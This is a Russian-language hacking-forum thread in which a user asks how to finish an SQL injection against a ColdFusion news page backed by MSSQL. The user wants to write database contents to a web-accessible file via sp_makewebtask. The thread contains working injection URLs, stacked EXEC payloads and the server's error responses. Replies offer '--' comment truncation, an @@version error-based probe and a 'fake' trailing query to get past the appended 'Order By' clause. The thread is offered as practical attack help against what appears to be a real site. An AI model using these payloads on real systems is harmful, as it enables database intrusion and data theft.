![]() |
как закрыть order в запросе к mssql
Всем привет! подскажите как закрыть 'Order'
инъекция в cfm скрипте,все таблицы ,колонки и т.д даёт нормально,права sa хочу вывести таблицу в файл на сервере с помощью sp_makewebtask, в вебдиректорию в сообщение о ошибке есть полный путь до вебдиры,и запрос к бд Код:
site.com/dir/news.cfm?news_id=-1'Код:
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''.делаю запрос Код:
http://site.com/dir/news.cfm?News_ID=1;%20EXEC%20master..sp_makewebtask%20%22F:\www\site.com\www\dir\output.html%22,%20%22SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES%22Код:
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'Order'. |
закоментировать не пробовал?
|
Используй усечение запроса комментами "--"(два тире), ставь в конце своего запроса
|
пробовал запрос становится вида
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''. Код:
SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"-- Order By DisplayOrder |
никто незнает чтоли?
|
Цитата:
https://forum.antichat.ru/thread30501.html здесь непосредственно про обход кавычек https://forum.antichat.ru/threadnav30501-3-10.html |
подставь 1+or+1=@@version--
|
Цитата:
|
А те путь известен?
Вообще не факт что ты trptr исполнять можешь лей не спеша и потихоньку... |
поробуй сделать "фейковый" запрос
тогда запрос у тебя будет типа такого: Код:
News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"; SELECT * From News Where News_ID = 1 |
| Время: 21:35 |